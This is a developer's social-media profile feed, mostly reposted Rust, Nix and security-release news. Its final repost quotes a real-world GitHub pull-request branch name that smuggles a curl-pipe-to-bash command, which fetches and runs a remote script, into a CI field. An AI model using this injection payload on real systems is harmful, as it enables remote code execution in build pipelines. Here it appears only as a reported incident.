Sign in

Cathal

@cathal.dev
140 followers 584 following 10 posts

(it's pronounced ka-hill) Developer from Derry, Currently working on github.com/SwornSystems 123456789009909800090345678900980123456789009800001023456789009900500012345678900234567800090009009123456789009809

PostsRepliesMedia
Reposted by Cathal
Dirkjan Ochtman @djc.ochtman.nl · 03/09/2026
PSA: if you depend on Hickory DNS, upgrade now: github.com/hickory-dns/... DNS implementations (not just Hickory) have been hit pretty hard by LLM-assisted vulnerability research.
github.com
Release v0.26.2 · hickory-dns/hickory-dns
This release fixes a large number of security vulnerabilities. Most of the issues were related to DNSSEC validation, denial of service and resource consumption attacks, and reachable panics in pars...
23311
Reposted by Cathal
Dirkjan Ochtman @djc.ochtman.nl · 13/08/2026
Happy to announce a new project: OxiSH, a modern, memory-safe SSH server. dirkjan.ochtman.nl/writing/2026... Prossimo has three criteria for suggesting memory-safe rewrites: (1) widely used, (2) on a security boundary and (3) performing a critical function. This is clearly true for SSH servers.
dirkjan.ochtman.nl
OxiSH: a modern, memory-safe SSH server – Dirkjan Ochtman
26714
Cathal @cathal.dev · 22/07/2026
Maybe one day, if most of these goals land. rust-lang.github.io/rust-project...
rust-lang.github.io
Fast Builds - Rust Project Goals
130
Reposted by Cathal
Damien Miller @damienmiller.bsky.social · 06/07/2026
OpenSSH 10.4 has just been released This release includes a number of security and bug fixes, as well as a handful of new features - most notable experimental support for a hybrid post-quantum signature scheme (ML-DSA 44 with Ed25519). www.openssh.org/releasenotes...
openssh.org
OpenSSH: Release Notes
OpenSSH release notes
04313
Reposted by Cathal
Sean McArthur @seanmonstar.com · 30/06/2026
Do you use #rustlang hyper/h2 at scale? Would you be able to easily try out a performance run using a PR that is meant to significantly reduce contention with multi-threaded HTTP/2? It would be a big help! github.com/hyperium/h2/...
github.com
Refactor big mutex to reduce contention by seanmonstar · Pull Request #917 · hyperium/h2
This refactor puts the big internal shared mutex on a diet. The goal is to reduce contention, providing performance improvements when h2 is used on multi-threaded runtimes. WarningThis is a large i...
2207
Reposted by Cathal
Joe Birr-Pixton @jbp.io · 18/06/2026
I released Graviola 0.4.0 yesterday, with a new and quite quick ML-KEM-768 implementation. More perf work to do on this, but it is already quicker than libcrux-ml-kem, and competitive with mlkem-native on ARM64. And still builds mega fast! Consider supporting this work on github.com/sponsors/ctz
1235
Reposted by Cathal
James Snell @jasnell.me · 14/06/2026
Oh. After many long years... HTTP now officially has a standard QUERY method. Think: cacheable, idempotent GET that can carry a meaningful payload. We can now all stop bastardizing POST. auth48-transition.rfc-editor.org/authors/rfc1...
auth48-transition.rfc-editor.org
37114
Reposted by Cathal
nia (cia asset) @nia.is.fckn.gay · 24/05/2026
WHEEEEEEEEEE github.com/rust-lang/ru...
github.com
alloc: stabilise `Allocator` by nia-e · Pull Request #156882 · rust-lang/rust
Stabilise a bare-minimum (dyn-incompatible, but could be in the future) Allocator trait, alongside Box::new_in(), Vec::new_in(), the System Allocator impl, and a blanket impl of Allocator for T: Gl...
417938
Reposted by Cathal
OpenTelemetry @opentelemetry.io · 26/03/2026
Three pillars becomes four. The #OpenTelemetry project is excited to share that profiles are now alpha! With #OTel profiles, you get an industry-wide standard for production profiling, with true vendor neutrality and powered by community support. Read more in our latest post! buff.ly/DfYetYF
0174
Reposted by Cathal
SolidJS @solidjs.com · 03/03/2026
The <Suspense> is over. Solid 2.0 Beta is now released (next tag on npm). 🎉 github.com/solidjs/soli...
github.com
Release v2.0.0 Beta - The <Suspense> is Over · solidjs/solid
I know you all probably weren't expecting this announcement next. But after reviewing the roadmap, we spent so long iterating in the Experimental phase, most of the goalposts within Alpha don't app...
515734
Cathal @cathal.dev · 27/02/2026
Hmm, seems similar enough for me to think its this call that's causing the issue: github.com/uncenter/kit... Maybe try hard-coding it to 80 to see if that fixes CI
github.com
310
Cathal @cathal.dev · 27/02/2026
I think I hit the same issue before. it's not an insta problem, it's crossterm not working right in CI envs: github.com/crossterm-rs...
github.com
something wrong when running inside container · Issue #838 · crossterm-rs/crossterm
Describe the bug something wrong when running inside container source 1: match crossterm::terminal::enable_raw_mode() { Ok(_) => {} Err(e) => { tracing::error!("failed to enable raw mode,err: {e}")...
100
Reposted by Cathal
imperio @imperioworld.bsky.social · 22/01/2026
Starting tomorrow, you will be able (on linux without cross-compilation) to install and use the Rust GCC backend directly from rustup! To do so: rustup component add rustc-codegen-gcc Thanks a lot to @jberanek.bsky.social for all their work to make it a reality! github.com/rust-lang/ru...
github.com
Add GCC and the GCC codegen backend to build-manifest and rustup by Kobzol · Pull Request #151156 · rust-lang/rust
This PR adds the GCC codegen backend, and the GCC (libgccjit) component upon which it depends, to build-manifest, and thus also to (nightly) Rustup. I added both components in a single PR, because ...
07410
Cathal @cathal.dev · 11/01/2026
Created some tree-sitter grammars for Cedar and CedarSchema: github.com/DuskSystems/... #treesitter #cedar
github.com
GitHub - DuskSystems/tree-sitter-cedar: Cedar grammars for tree-sitter.
Cedar grammars for tree-sitter. Contribute to DuskSystems/tree-sitter-cedar development by creating an account on GitHub.
000
Cathal @cathal.dev · 10/01/2026
There's KYAML, though it has essentially no adoption outside of Kubernetes still.
010
Reposted by Cathal
Sean McArthur @seanmonstar.com · 23/12/2025
Just published a new #rustlang reqwest release candidate: v0.13.0-rc.1. This has some breaking changes, the biggest was switching to rustls by default. I'd appreciate if you gave it a spin 🙏 github.com/seanmonstar/...
github.com
Release v0.13.0-rc.1 · seanmonstar/reqwest
👀 Discussion here if you give it try, thanks! Main breaking changes rustls is now default instead of native-tls rustls provider defaults to aws-lc instead of ring (rustls-no-provider exists if you...
13310
Reposted by Cathal
Boshen @boshen.github.io · 13/12/2025
cargo-shear v1.8.0 now reports unused .rs files. github.com/Boshen/carg... Thank you @cathal.dev for spending a long time implementing this.
1344
Reposted by Cathal
Proton @proton.me · 11/12/2025
The Proton Pass CLI, which was recently released as a beta, is now officially launched! Enable faster workflows, reduce context switching, and implement secure automation across local development, servers, and CI/CD environments with this new and secure Command Line Interface.
Proton Pass' CLI in operation, a terminal window sits on a gradient background.
110214
Reposted by Cathal
Andrew Lilley Brinker @alilleybrinker.com · 11/12/2025
Includes a new "Optimizing Build Performance" section added to the Cargo Book!
doc.rust-lang.org
Optimizing Build Performance - The Cargo Book
0111
Reposted by Cathal
Zed @zed.dev · 10/12/2025
🚀 We just shipped v0.216.0! Word-level diffing just landed. 🎉 It's been a night-and-day difference for us—seeing exactly what changed within each line.
21269
Reposted by Cathal
Dirkjan Ochtman @djc.ochtman.nl · 08/12/2025
Earlier this year, LWN.net featured an excellent article named "Linux's missing CRL infrastructure", and today Canonical announced it will be working with me and @jbp.io over the coming weeks to start bridging the PKI infrastructure gap. discourse.ubuntu.com/t/addressing...
discourse.ubuntu.com
Addressing Linux's Missing PKI Infrastructure
Earlier this year, LWN featured an excellent article titled “Linux’s missing CRL infrastructure”. The article highlighted a number of key issues surrounding traditional Public Key Infrastructure (PKI)...
3255
Reposted by Cathal
Adam Argyle @nerdy.dev · 05/12/2025
Fit width text in 1 line of CSS `text-grow: per-line scale;` nerdy.dev/css-text-grow (prototype in Canary 165+)
1433255
Cathal @cathal.dev · 03/12/2025
Latest `cargo-shear` release now uses `miette` for its output, and has some new diagnostics around optional dependencies. cargo-shear: Detect and fix unused/misplaced dependencies in Rust projects crates.io/crates/cargo... #rust #rustlang
Screenshot of a `cargo-shear` lint warning showing an unused optional dependency. The warning shows `rustls` is declared as an optional dependency, but is not used in code. It has 2 attached notes. The first note warns that removing an optional dependency may be a breaking change. The second note shows that `rustls` is referenced by a feature definition.
0131
Reposted by Cathal
Ian Coldwater 🧊🚫 @lookitup.baby · 03/12/2025
A perfect CVSS 10 🧑🏻‍🍳💋 CVE-2025-55182: Unauthenticated remote code execution vulnerability in React Server Components The vuln is in versions 19.0, 19.1.0, 19.1.1, and 19.2.0: react-server-dom-webpack react-server-dom-parcel react-server-dom-turbopack Upgrade immediately!
react.dev
Critical Security Vulnerability in React Server Components – React
The library for web and native user interfaces
18286119
Reposted by Cathal
Sean McArthur @seanmonstar.com · 03/12/2025
Announcing @hyper.rs composable pool layers! We took the various aspects of a connection pool and made them into individual layers to combine as needed. This is something I've been thinking about for years, I'm so glad it's finally coming out. #rustlang seanmonstar.com/blog/hyper-u...
seanmonstar.com
hyper-util Composable Pools
Announcing connection pool layers allowing advanced composition in Rust.
0346
Reposted by Cathal
Boshen @boshen.github.io · 30/11/2025
cargo-shear now runs 1.5× faster, a total of 2x than older versions. Thank you @cathal.dev and @permutans.bsky.social! cargo-shear: Detect and remove unused dependencies from Cargo.toml github.com/Boshen/cargo...
github.com
Release v1.7.0 · Boshen/cargo-shear
Added improve redundant ignore warning messages (#333) Performance collect import syntax tokens not string (#328) Process packages in parallel using rayon (#329) Refactor Replace cargo_toml wi...
0144
Reposted by Cathal
Boshen @boshen.github.io · 26/11/2025
cargo-shear now runs 1.3x faster and accepts nightly syntax features, after switching parser from `syn` to `ra_ap_syntax` (rust-analyzer's parser). github.com/Boshen/carg...
github.com
Release v1.6.6 · Boshen/cargo-shear
Features Fix detection of redundant workspace ignores (#324) Switch from syn to ra_ap_syntax for parsing (#322) Fixed fix incorrect --version output (#326) At least 1.3x performance improvemen...
1113
Cathal @cathal.dev · 24/11/2025
Recently contributed some features to cargo-shear: github.com/boshen/cargo... It can now detect dependencies that should be dev-dependencies (and fix them), better handles feature-gated deps, and handles platform-specific deps now too.
github.com
GitHub - Boshen/cargo-shear: Detect and remove unused dependencies from Cargo.toml
Detect and remove unused dependencies from Cargo.toml - Boshen/cargo-shear
080
Reposted by Cathal
Sean McArthur @seanmonstar.com · 18/11/2025
I'm excited to announce the first @hyper.rs user survey! If you've used hyper (or related libraries) just a little or a whole bunch, providing feedback is invaluable and should take less than 5 minutes. Give it a go! seanmonstar.com/blog/hyper-u... #rustlang
seanmonstar.com
hyper User Survey 2025
I’m excited to announce the inaugural hyper user survey!
2198
Reposted by Cathal
Mara Bos @mara.bsky.social · 13/11/2025
🦀 I've improved the implementation behind all the string formatting macros in Rust: println, panic, format, write, log::info, etc. (Everything using format_args!().) They will compile a bit faster, use a bit less memory while compiling, result in smaller binaries, and produce more efficient code! 🎉
The source of the standard Rust Hello World program with the generated assembly before and after the change.

The before version has 11 instructions and stores 56 bytes on the stack. The after version has 3 instructions and stores no data on the stack.
1153460
Reposted by Cathal
Nicolas Chevobbe @nicolaschevobbe.bsky.social · 07/11/2025
The @firefoxdevtools.bsky.social JSON viewer got better in @firefoxnightly.bsky.social : the console offers access to the original json data via `$json`. This allows to easily manipulate the underlying data to get what you want
Firefox JSON Viewer opened for the html entites JSON file
We can see the various properties of the JSON file, which are all objects containing a "characters" and a "codepoints" properties.
The Console is opened at the bottom. In it, we can see a console message explaining that some data is available (`$json.data` - the parsed JSON object, $json.text` - the original JSON text and `$json.headers` - HTTP request and response headers)

There's a console evaluation done with the following snippet:

```js
Object.entries($json.data)
    .filter(([k, v]) => v.codepoints.length > 1)
    .map(([k, v]) => ({characters: v.characters, htmlEntity: k, codepoints: v.codepoints}))

```

and the result shows an array of objects containing "characters", "htmlEntity" and "codepoints" properties.
49828
Reposted by Cathal
The Rust Foundation @rustfoundation.org · 04/11/2025
Exciting news! Today, we announced the Rust Foundation Maintainers Fund: an initiative to provide consistent, transparent, long-term support for the developers who make Rust possible. Supporting maintainers = supporting Rust’s future. Learn more: rustfoundation.org/media/announ...
rustfoundation.org
Announcing the Rust Foundation Maintainers Fund
03614
Reposted by Cathal
nikomatsakis @nikomatsakis.com · 22/10/2025
New #rust blog post on how we could get types that cannot be forgotten, types that must be moved, async and const drop, and other fun stuff: smallcultfollowing.com/babysteps/bl...
smallcultfollowing.com
Move, Destruct, Leak, and Rust · baby steps
3468
Reposted by Cathal
Servo @servo.org · 10/10/2025
Igalia is excited to announce a new commission from the Sovereign Tech Fund to advance the Servo web engine. www.igalia.com/2025/10/09/I...
igalia.com
Igalia, Servo, and the Sovereign Tech Fund | Igalia
Igalia is an open source consultancy specialised in the development of innovative projects and solutions. Our engineers have expertise in a wide range of technological areas, including browsers and cl...
37221
Reposted by Cathal
Boa @boajs.dev · 24/09/2025
Temporal_rs has been released!!! This is the first public release of Temporal_rs, a Rust implementation of the Temporal API powering Boa, Kiesel, V8 plus other engines. This will be shipping in Chromium soon More info in our blog post: boajs.dev/blog/2025/09...
boajs.dev
Temporal_rs is here! The datetime library powering Temporal in Boa, Kiesel, and V8 | Boa JS
clock banner
1647
Reposted by Cathal
amos @fasterthanli.me · 12/09/2025
PSA: don't fall for the crates.io phishing campaign: fasterthanli.me/articles/cra... #rustlang
fasterthanli.me
crates.io phishing attempt
Earlier this week, an npm supply chain attack. It’s turn for crates.io, the main public repository for Rust crates (packages). The phishing e-mail looks like this: And it leads to a GitHub login pa...
14014
Reposted by Cathal
PlanetScale @planetscale.com · 01/07/2025
PlanetScale now supports Postgres.
22312
Reposted by Cathal
Zed @zed.dev · 18/06/2025
After hearing this a lot: "no debugger = no Zed"—we’re excited to share that Zed's Debugger has finally launched! 🎉 zed.dev/debugger
1120535
Cathal @cathal.dev · 10/04/2025
Fleshed out my #Nix @zed.dev extensions project. 400+ extensions packaged, with daily updates via a GitHub workflow. github.com/DuskSystems/...
github.com
GitHub - DuskSystems/nix-zed-extensions: Nix expressions for Zed extensions.
Nix expressions for Zed extensions. Contribute to DuskSystems/nix-zed-extensions development by creating an account on GitHub.
020
Cathal @cathal.dev · 31/03/2025
For anyone out there using @proton.me Mail/Pass on #NixOS, I've packaged the desktop clients from source here, since they only distribute x86_64 versions officially. github.com/DuskSystems/...
github.com
GitHub - DuskSystems/nix-proton: Nix expressions for Proton applications and extensions.
Nix expressions for Proton applications and extensions. - DuskSystems/nix-proton
030
Reposted by Cathal
Supabase @supabase.com · 29/03/2025
As a pre-launch of the Launch Week 14, we’re announcing the initial release of Postgres Language Server! It includes: - Autocompletion - Syntax Error Highlighting - Typechecking ⁃ Linting Shout-out to @psteinroe.com and juleswritescode for the hard work! supabase.com/blog/postgre...
supabase.com
Postgres Language Server: Initial Release
Language Server Protocol and collection of language tools for Postgres
0185
Reposted by Cathal
Ben @benjdd.com · 13/03/2025
I implemented an ssd, hdd, and tape device. In javascript. For a blog.
919319
Reposted by Cathal
Zed @zed.dev · 05/03/2025
The Git private beta is coming along! We're shipping daily preview patches to fix bugs based on your input. For those in the beta pool, we'd love to hear what's working well and what needs our attention.
7613
Reposted by Cathal
Steve Klabnik @steveklabnik.com · 06/03/2025
Not my story but imho nothing will ever top gist.github.com/kemitchell/f...
714323
Reposted by Cathal
Element @element.io · 14/02/2025
We've signed the letter to the UK Home Secretary asking for the withdrawal of the TCN issued to Apple under the IPA. We're asking UK govt to listen to experts who continuously explain there are no safe backdoors. You can add your voice by signing this letter until the 20th of February.
globalencryption.org
Joint Letter on the UK Government's use of Investigatory Powers Act to attack End-to-End Encryption – Global Encryption Coalition
On 13 February 2025, 109 civil society organizations, companies, and cybersecurity experts, including Global Encryption Coalition members, published a joint letter to the British Home Secretary Yvette...
094
Reposted by Cathal
Arthur Pastel @apas.tel · 13/02/2025
We just released a Divan 🛋️ integration. So far, this is the best developer experience you can hope for building performance tests in Rust 🦀! codspeed.io/changelog/20...
codspeed.io
Divan Support for Rust - Changelog - CodSpeed
New updates and improvements released to Codspeed.
142
Reposted by Cathal
zimbatm @zimbatm.com · 16/12/2024
We finished upstreaming nixos-generators project. Take existing NixOS configurations and generate images for all sort of targets: ``` nixos-rebuild build-image --flake .#my-system --image-variant digital-ocean ``` github.com/NixOS/nixpkg...
github.com
nixos-rebuild: init build-image subcommand by phaer · Pull Request #347275 · NixOS/nixpkgs
I split preparation for this into smaller PRs, after feedback: make-disk-image: Allow passing of image baseName #359326 image/images: init #359328 virtualisation: Use system.build.image, normalize...
4369
Reposted by Cathal
Matt Keeter @mattkeeter.com · 06/12/2024
absolutely incredible attack vector
Picture of a Github PR with text reading

openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
16940256